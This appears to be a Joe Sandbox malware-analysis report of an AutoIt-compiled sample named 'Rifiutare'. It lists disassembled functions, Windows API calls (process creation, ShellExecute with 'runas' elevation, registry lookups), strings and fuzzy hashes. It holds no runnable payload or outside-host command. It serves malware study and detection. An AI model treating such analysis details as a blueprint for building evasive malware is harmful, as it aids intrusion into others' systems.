GetFullPathNameW.KERNEL32(00007FFF,?,?,00D02408,00D023F0,?,?,?,?,?,?,00C3292D,?), ref: 00C333CD

Part of subcall function 00C3B0DB: _wcslen.LIBCMT ref: 00C3B0EE

Part of subcall function 00C345A6: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,00C333F5,00D02408,?,?,?,?,?,?,?,00C3292D,?), ref: 00C345E7

SetCurrentDirectoryW.KERNEL32(?,00000001,00D02408,?,?,?,?,?,?,?,00C3292D,?), ref: 00C3344E
MessageBoxA.USER32(00000000,It is a violation of the AutoIt EULA to attempt to reverse engineer this program.,AutoIt,00000010), ref: 00C73E23
SetCurrentDirectoryW.KERNEL32(?,00D02408,?,?,?,?,?,?,?,00C3292D,?), ref: 00C73E64
GetForegroundWindow.USER32(runas,?,?,?,00000001,?,00CF31F4,00D02408,?,?,?,?,?,?,?,00C3292D), ref: 00C73EED
ShellExecuteW.SHELL32(00000000,?,?), ref: 00C73EF4

Part of subcall function 00C33466: GetSysColorBrush.USER32(0000000F), ref: 00C33471
Part of subcall function 00C33466: LoadCursorW.USER32(00000000,00007F00), ref: 00C33480
Part of subcall function 00C33466: LoadIconW.USER32(00000063), ref: 00C33496
Part of subcall function 00C33466: LoadIconW.USER32(000000A4), ref: 00C334A8
Part of subcall function 00C33466: LoadIconW.USER32(000000A2), ref: 00C334BA
Part of subcall function 00C33466: LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00C334D2
Part of subcall function 00C33466: RegisterClassExW.USER32(?), ref: 00C33523

Part of subcall function 00C33546: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00C33574
Part of subcall function 00C33546: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00C33595
Part of subcall function 00C33546: ShowWindow.USER32(00000000,?,?,?,?,?,?,00C3292D,?), ref: 00C335A9
Part of subcall function 00C33546: ShowWindow.USER32(00000000,?,?,?,?,?,?,00C3292D,?), ref: 00C335B2

Part of subcall function 00C33DF8: Shell_NotifyIconW.SHELL32(00000000,?), ref: 00C33EC9

Strings

AutoIt, xrefs: 00C73E18
It is a violation of the AutoIt EULA to attempt to reverse engineer this program., xrefs: 00C73E1D
runas, xrefs: 00C73EE8

Memory Dump Source

Source File: 00000007.00000002.1742302453.0000000000C31000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C30000, based on PE: true

Associated: 00000007.00000002.1742251898.0000000000C30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742433362.0000000000CCD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742433362.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742573979.0000000000CFD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742616192.0000000000D05000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_c30000_Rifiutare.jbxd

Similarity

API ID: LoadWindow$Icon$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__wcslen
String ID: AutoIt$It is a violation of the AutoIt EULA to attempt to reverse engineer this program.$runas
API String ID: 683915450-2030392706
Opcode ID: d3e41a3b6953f1b9ad78b0b16ac67f93d7875c864725f59b6e702c5fe6482ddf
Instruction ID: a55ff8bd1799642bcce06cf67aa36f6fdc5fa5a31f0ca0abfa493561618b99ec
Opcode Fuzzy Hash: d3e41a3b6953f1b9ad78b0b16ac67f93d7875c864725f59b6e702c5fe6482ddf
Instruction Fuzzy Hash: E851D7712193816EC719EF61EC85F7F7BA8DB95700F04052CF596822A2CA749B49F732

Function 00C9E334 Relevance: 4.5, APIs: 3, Instructions: 25fileCOMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNELBASE(?,00C76043), ref: 00C9E344
FindFirstFileW.KERNELBASE(?,?), ref: 00C9E355
FindClose.KERNEL32(00000000), ref: 00C9E365

Memory Dump Source

Source File: 00000007.00000002.1742302453.0000000000C31000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C30000, based on PE: true

Associated: 00000007.00000002.1742251898.0000000000C30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742433362.0000000000CCD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742433362.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742573979.0000000000CFD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742616192.0000000000D05000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_c30000_Rifiutare.jbxd

Similarity

API ID: FileFind$AttributesCloseFirst
String ID:
API String ID: 48322524-0
Opcode ID: ee219b3360390afb8144ec4435a40bf86f903f8fa0ecf5450fc247caf91cfaa8
Instruction ID: 3641f1edf8e4cb57ac3b7b578d2b1a43c55a4e12d62119a39372db52f4520d78
Opcode Fuzzy Hash: ee219b3360390afb8144ec4435a40bf86f903f8fa0ecf5450fc247caf91cfaa8
Instruction Fuzzy Hash: 99E04F318149106B9610AB38EC0E9EEB75CBB15335F100725F976C21F0EB70AE458696

Function 00C55108 Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(00000003,?,00C550DE,00000003,00CF9820,0000000C,00C55235,00000003,00000002,00000000,?,00C62D05,00000003), ref: 00C55129
TerminateProcess.KERNEL32(00000000,?,00C550DE,00000003,00CF9820,0000000C,00C55235,00000003,00000002,00000000,?,00C62D05,00000003), ref: 00C55130
ExitProcess.KERNEL32 ref: 00C55142

Memory Dump Source

Source File: 00000007.00000002.1742302453.0000000000C31000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C30000, based on PE: true

Associated: 00000007.00000002.1742251898.0000000000C30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742433362.0000000000CCD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742433362.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742573979.0000000000CFD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742616192.0000000000D05000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_c30000_Rifiutare.jbxd

Similarity

API ID: Process$CurrentExitTerminate
String ID:
API String ID: 1703294689-0
Opcode ID: 23508c14df1b4af015f8aaf13055eae9095a9bba79ef8f8f4fe2b86f2ffb7f9e
Instruction ID: a097ea9204d343037bf7dd19e44c7f11c454693f746f80159c493169a4c421e4
Opcode Fuzzy Hash: 23508c14df1b4af015f8aaf13055eae9095a9bba79ef8f8f4fe2b86f2ffb7f9e
Instruction Fuzzy Hash: B2E09235410A88ABCB216FA4DD29F5D3F79AB40392F094024F8168A132DB35DE86EA84

Function 00C37CDD Relevance: 30.0, APIs: 2, Strings: 15, Instructions: 276
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

#notrayicon, xrefs: 00C37D4C
", xrefs: 00C75F6A
#comments-end, xrefs: 00C37E3E
#cs, xrefs: 00C37DD8, 00C37E2A
#include, xrefs: 00C37DAC
Cannot parse #include, xrefs: 00C7609A
#ce, xrefs: 00C37E52
Unterminated group of comments, xrefs: 00C760AD
#OnAutoItStartRegister, xrefs: 00C37D7C
Bad directive syntax error, xrefs: 00C75FB1
#requireadmin, xrefs: 00C37D64
#pragma compile, xrefs: 00C37D38
#comments-start, xrefs: 00C37DC4, 00C37E16
#include-once, xrefs: 00C37D94
', xrefs: 00C75F80

Memory Dump Source

Source File: 00000007.00000002.1742302453.0000000000C31000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C30000, based on PE: true

Associated: 00000007.00000002.1742251898.0000000000C30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742433362.0000000000CCD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742433362.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742573979.0000000000CFD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742616192.0000000000D05000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_c30000_Rifiutare.jbxd

Similarity

API ID:
String ID: "$#OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$'$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
API String ID: 0-1645009161
Opcode ID: 4fa1ff8e54f20d9a2361f168c0f5d760622ce62b8e955769e17f15ca0cf12736
Instruction ID: 4d1ab3a9db24d715a94426384f2df9371c105a32feb7086ec81975eb2e26cf98
Opcode Fuzzy Hash: 4fa1ff8e54f20d9a2361f168c0f5d760622ce62b8e955769e17f15ca0cf12736
Instruction Fuzzy Hash: 439105B1604605BBCF21AF64DC42FBE37A8AF05300F148164FD09AB182EB71DE55E7A5

Function 00CBB779 Relevance: 24.4, APIs: 16, Instructions: 418
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_wcslen.LIBCMT ref: 00CBB918
GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00CBB930
GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00CBB954
_wcslen.LIBCMT ref: 00CBB980
GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00CBB994
GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00CBB9B6
_wcslen.LIBCMT ref: 00CBBAB2

Part of subcall function 00CA0E01: GetStdHandle.KERNEL32(000000F6), ref: 00CA0E20

_wcslen.LIBCMT ref: 00CBBACB
_wcslen.LIBCMT ref: 00CBBAE6
CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00CBBB36
GetLastError.KERNEL32(00000000), ref: 00CBBB87
CloseHandle.KERNEL32(?), ref: 00CBBBB9
CloseHandle.KERNEL32(00000000), ref: 00CBBBCA
CloseHandle.KERNEL32(00000000), ref: 00CBBBDC
CloseHandle.KERNEL32(00000000), ref: 00CBBBEE
CloseHandle.KERNEL32(?), ref: 00CBBC63

Memory Dump Source

Source File: 00000007.00000002.1742302453.0000000000C31000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C30000, based on PE: true

Associated: 00000007.00000002.1742251898.0000000000C30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742433362.0000000000CCD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742433362.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742573979.0000000000CFD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742616192.0000000000D05000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_c30000_Rifiutare.jbxd

Similarity

API ID: Handle$Close_wcslen$Directory$CurrentSystem$CreateErrorLastProcess
String ID:
API String ID: 2178637699-0
Opcode ID: fc1b201582f2148833a866e6a6110cc36f7a050c3c17633bad3d88d62c17dd8b
Instruction ID: 261760ba63b7357bab40a66155d2b29e6578c2578b5bb5e5b08c669aaf55647f
Opcode Fuzzy Hash: fc1b201582f2148833a866e6a6110cc36f7a050c3c17633bad3d88d62c17dd8b
Instruction Fuzzy Hash: EAF1DD316043409FCB14EF24C881BAEBBE5AF85314F18855DF89A9B2A2CB71ED44DB52

Function 00C3DCA4 Relevance: 21.6, APIs: 14, Instructions: 618windowsleeptimeCOMMON

Download Yara Rule

APIs

GetInputState.USER32 ref: 00C3DD67
timeGetTime.WINMM ref: 00C3DF67
PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00C3E088
TranslateMessage.USER32(?), ref: 00C3E0DB
DispatchMessageW.USER32(?), ref: 00C3E0E9
PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00C3E0FF
Sleep.KERNEL32(0000000A), ref: 00C3E111

Memory Dump Source

Source File: 00000007.00000002.1742302453.0000000000C31000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C30000, based on PE: true

Associated: 00000007.00000002.1742251898.0000000000C30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742433362.0000000000CCD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742433362.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742573979.0000000000CFD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742616192.0000000000D05000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_c30000_Rifiutare.jbxd

Similarity

API ID: Message$Peek$DispatchInputSleepStateTimeTranslatetime
String ID:
API String ID: 2189390790-0
Opcode ID: 54a83d20c14f2b4c1879d55ac8d56227ca650606b3fa48928831a6dc14098942
Instruction ID: 49e59b0e22d50dadd03b702b9883b88146dc531db325fadd65d5a121fcbe60c8
Opcode Fuzzy Hash: 54a83d20c14f2b4c1879d55ac8d56227ca650606b3fa48928831a6dc14098942
Instruction Fuzzy Hash: 2D32E270614782AFD728DF24D888BAEB7E4BF45308F14452DE46B872D1C770EA84DB96

Function 00C335B7 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 53
windowregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSysColorBrush.USER32(0000000F), ref: 00C335EA
RegisterClassExW.USER32(00000030), ref: 00C33614
RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00C33625
InitCommonControlsEx.COMCTL32(?), ref: 00C33642
ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00C33652
LoadIconW.USER32(000000A9), ref: 00C33668
ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00C33677

Strings

+, xrefs: 00C335D3
TaskbarCreated, xrefs: 00C3361A
AutoIt v3 GUI, xrefs: 00C33606
0, xrefs: 00C335CC

Memory Dump Source

Source File: 00000007.00000002.1742302453.0000000000C31000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C30000, based on PE: true

Associated: 00000007.00000002.1742251898.0000000000C30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742433362.0000000000CCD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742433362.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742573979.0000000000CFD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742616192.0000000000D05000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_c30000_Rifiutare.jbxd

Similarity

API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
String ID: +$0$AutoIt v3 GUI$TaskbarCreated
API String ID: 2914291525-1005189915
Opcode ID: 9876a61b155656922a08edb3682d722db9978fe86cf86d1e11270abe3c73afc0
Instruction ID: ea5dc39168ca0348cc156e44ad935e30f41c3d8055e34be94341e4cad714c2d1
Opcode Fuzzy Hash: 9876a61b155656922a08edb3682d722db9978fe86cf86d1e11270abe3c73afc0
Instruction Fuzzy Hash: 4421C0B5952318AFDB009FA4EC89BADBBB4FB08710F00412AF616E62A0D7B545448FA4

Function 00C70A7C Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 272
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00C707BB: CreateFileW.KERNELBASE(00000000,00000000,?,00C70B25,?,?,00000000,?,00C70B25,00000000,0000000C), ref: 00C707D8

GetLastError.KERNEL32 ref: 00C70B90
__dosmaperr.LIBCMT ref: 00C70B97
GetFileType.KERNELBASE(00000000), ref: 00C70BA3
GetLastError.KERNEL32 ref: 00C70BAD
__dosmaperr.LIBCMT ref: 00C70BB6
CloseHandle.KERNEL32(00000000), ref: 00C70BD6
CloseHandle.KERNEL32(?), ref: 00C70D20
GetLastError.KERNEL32 ref: 00C70D52
__dosmaperr.LIBCMT ref: 00C70D59

Strings

H, xrefs: 00C70CDE

Memory Dump Source

Source File: 00000007.00000002.1742302453.0000000000C31000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C30000, based on PE: true

Associated: 00000007.00000002.1742251898.0000000000C30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742433362.0000000000CCD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742433362.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742573979.0000000000CFD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742616192.0000000000D05000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_c30000_Rifiutare.jbxd

Similarity

API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
String ID: H
API String ID: 4237864984-2852464175
Opcode ID: e2b5a1f19bc4e1ecdea935222a4ce9a6c8674545f5cde915a1a8e2aa374d3650
Instruction ID: 8c19f2388b8fcba777ce3db060f555df40d059c72a032a17d550878408cc5ddb
Opcode Fuzzy Hash: e2b5a1f19bc4e1ecdea935222a4ce9a6c8674545f5cde915a1a8e2aa374d3650
Instruction Fuzzy Hash: D6A14732A10604DFDF29DF68C892BAE7BA1EF06320F284159F819DB3D1CB309912DB51

Function 00C34E52 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 201
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00C34FF8: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,?,?,00C74641,?,?,00000100,00000000,00000000,CMDLINE,?,?,00000001,00000000), ref: 00C35016

Part of subcall function 00C34B95: GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 00C34BB7

RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 00C34F6F
RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 00C748D8
RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 00C74919
RegCloseKey.ADVAPI32(?), ref: 00C7495B
_wcslen.LIBCMT ref: 00C749C2
_wcslen.LIBCMT ref: 00C749D1

Strings

\Include\, xrefs: 00C34F2C
\, xrefs: 00C749D7
Include, xrefs: 00C748CF, 00C74910
Software\AutoIt v3\AutoIt, xrefs: 00C34F65

Memory Dump Source

Source File: 00000007.00000002.1742302453.0000000000C31000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C30000, based on PE: true

Associated: 00000007.00000002.1742251898.0000000000C30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742433362.0000000000CCD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742433362.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742573979.0000000000CFD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742616192.0000000000D05000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_c30000_Rifiutare.jbxd

Similarity

API ID: NameQueryValue_wcslen$CloseFileFullModuleOpenPath
String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
API String ID: 98802146-2727554177
Opcode ID: c9fb71ce4ce7dea98eebe3c603febe4372fd5bda6a978d36679404a8fa1082b0
Instruction ID: 47f4351c86a91a5615c5765603960f655cfdf5f8d2a7cfd7ed2741ce3b8d5643
Opcode Fuzzy Hash: c9fb71ce4ce7dea98eebe3c603febe4372fd5bda6a978d36679404a8fa1082b0
Instruction Fuzzy Hash: 51719B715183019EC318EF69EC81A9BBBECFF48340F40452EF559C72A1EB719A49CB62

Function 00C33466 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 63
windowregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSysColorBrush.USER32(0000000F), ref: 00C33471
LoadCursorW.USER32(00000000,00007F00), ref: 00C33480
LoadIconW.USER32(00000063), ref: 00C33496
LoadIconW.USER32(000000A4), ref: 00C334A8
LoadIconW.USER32(000000A2), ref: 00C334BA
LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00C334D2
RegisterClassExW.USER32(?), ref: 00C33523

Part of subcall function 00C335B7: GetSysColorBrush.USER32(0000000F), ref: 00C335EA
Part of subcall function 00C335B7: RegisterClassExW.USER32(00000030), ref: 00C33614
Part of subcall function 00C335B7: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00C33625
Part of subcall function 00C335B7: InitCommonControlsEx.COMCTL32(?), ref: 00C33642
Part of subcall function 00C335B7: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00C33652
Part of subcall function 00C335B7: LoadIconW.USER32(000000A9), ref: 00C33668
Part of subcall function 00C335B7: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00C33677

Strings

0, xrefs: 00C334F2
#, xrefs: 00C334F9
AutoIt v3, xrefs: 00C33512

Memory Dump Source

Source File: 00000007.00000002.1742302453.0000000000C31000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C30000, based on PE: true

Associated: 00000007.00000002.1742251898.0000000000C30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742433362.0000000000CCD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742433362.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742573979.0000000000CFD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742616192.0000000000D05000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_c30000_Rifiutare.jbxd

Similarity

API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
String ID: #$0$AutoIt v3
API String ID: 423443420-4155596026
Opcode ID: ce2e3a05604a5f9b2579d0f7ac64304d0115517ff05a23f448f2210ae88b0c3a
Instruction ID: 36d5ba32465250334a60fe76933b4b419f020ed3529bed2e6870970a474e327b
Opcode Fuzzy Hash: ce2e3a05604a5f9b2579d0f7ac64304d0115517ff05a23f448f2210ae88b0c3a
Instruction Fuzzy Hash: 3F21EAB4D11314ABDB109FA5EC49BADBFB4FB48B54F00402EE509E63A0D7BA5540CFA0

Function 00C37E80 Relevance: 16.3, APIs: 3, Strings: 6, Instructions: 530
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00C362AD: CloseHandle.KERNELBASE(00000000,00000000,?,00C3111D,00CCDBF4), ref: 00C362CD

Part of subcall function 00C33195: CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000,00000000,?,?,00C31153,?,00008000,00CCDBF4), ref: 00C331C3

SetCurrentDirectoryW.KERNELBASE(?,?,?,?,00000000), ref: 00C37FF4
_wcslen.LIBCMT ref: 00C38073
SetCurrentDirectoryW.KERNEL32(?), ref: 00C38151

Strings

Bad directive syntax error, xrefs: 00C76471
Error opening the file, xrefs: 00C76498, 00C764FF
AU3!, xrefs: 00C37FA5
#include depth exceeded. Make sure there are no recursive includes, xrefs: 00C760CB
EA06, xrefs: 00C76143
Unterminated string, xrefs: 00C764E3

Memory Dump Source

Source File: 00000007.00000002.1742302453.0000000000C31000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C30000, based on PE: true

Associated: 00000007.00000002.1742251898.0000000000C30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742433362.0000000000CCD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742433362.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742573979.0000000000CFD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742616192.0000000000D05000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_c30000_Rifiutare.jbxd

Similarity

API ID: CurrentDirectory$CloseCreateFileHandle_wcslen
String ID: #include depth exceeded. Make sure there are no recursive includes$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string
API String ID: 3350465876-3738523708
Opcode ID: 6384bd91138487bf59a575ed2ca3e09f4af26d9a48551bbbc0e00c0b0a9f878c
Instruction ID: 63ba217b5e45af6cb32f7f4e970044d288ff0ac06e84012317178a31b0af7f16
Opcode Fuzzy Hash: 6384bd91138487bf59a575ed2ca3e09f4af26d9a48551bbbc0e00c0b0a9f878c
Instruction Fuzzy Hash: 1412B1711183419FCB24EF24C881AAFBBE4BF95314F10491DF89A932A2DB71DA49DB53

Function 00C33C00 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 145
windowtimeregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DefWindowProcW.USER32(?,?,?,?,?,?,?,?,?,00C33BFA,?,?), ref: 00C33C68
KillTimer.USER32(?,00000001,?,?,?,?,?,00C33BFA,?,?), ref: 00C33C94
SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00C33CB7
RegisterWindowMessageW.USER32(TaskbarCreated,?,?,?,?,?,00C33BFA,?,?), ref: 00C33CC2
CreatePopupMenu.USER32 ref: 00C33CD6
PostQuitMessage.USER32(00000000), ref: 00C33CF7

Strings

TaskbarCreated, xrefs: 00C33CBD

Memory Dump Source

Source File: 00000007.00000002.1742302453.0000000000C31000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C30000, based on PE: true

Associated: 00000007.00000002.1742251898.0000000000C30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742433362.0000000000CCD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742433362.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742573979.0000000000CFD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742616192.0000000000D05000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_c30000_Rifiutare.jbxd

Similarity

API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
String ID: TaskbarCreated
API String ID: 129472671-2362178303
Opcode ID: b853586da68dfa61966639ca6475962fa3a8d79e76c6bb4230aef53e8244c371
Instruction ID: 935897d79af7da3e64351757bd7ba1da2fadfca772c6b54aae49afdb79cf294e
Opcode Fuzzy Hash: b853586da68dfa61966639ca6475962fa3a8d79e76c6bb4230aef53e8244c371
Instruction Fuzzy Hash: F241E530224288ABDB151F79FD4EB7D3A65EB04340F045329F91AE52E1CB75DB41A761

Function 00C363CE Relevance: 14.3, APIs: 7, Strings: 1, Instructions: 332
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 00C36417
CoUninitialize.COMBASE ref: 00C364B6
UnregisterHotKey.USER32(?), ref: 00C3669B
DestroyWindow.USER32(?), ref: 00C74DC7
FreeLibrary.KERNEL32(?), ref: 00C74E2C
VirtualFree.KERNEL32(?,00000000,00008000), ref: 00C74E59

Strings

close all, xrefs: 00C36412

Memory Dump Source

Source File: 00000007.00000002.1742302453.0000000000C31000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C30000, based on PE: true

Associated: 00000007.00000002.1742251898.0000000000C30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742433362.0000000000CCD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742433362.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742573979.0000000000CFD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742616192.0000000000D05000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_c30000_Rifiutare.jbxd

Similarity

API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
String ID: close all
API String ID: 469580280-3243417748
Opcode ID: af7106484b7fd1b24dd5ec82164a20e3fb4b8300b20ac06280dab60f400259a2
Instruction ID: 5ef2623d627e286817e1bddb5dac3426ce52c13365c98d2506048418a5eafdd2
Opcode Fuzzy Hash: af7106484b7fd1b24dd5ec82164a20e3fb4b8300b20ac06280dab60f400259a2
Instruction Fuzzy Hash: ABD18D71711212DFCB29DF54C895B29F7A4BF04714F2182ADE85AAB261CB30ED62DF90

Function 00C69165 Relevance: 13.8, APIs: 9, Instructions: 300
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000007.00000002.1742302453.0000000000C31000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C30000, based on PE: true

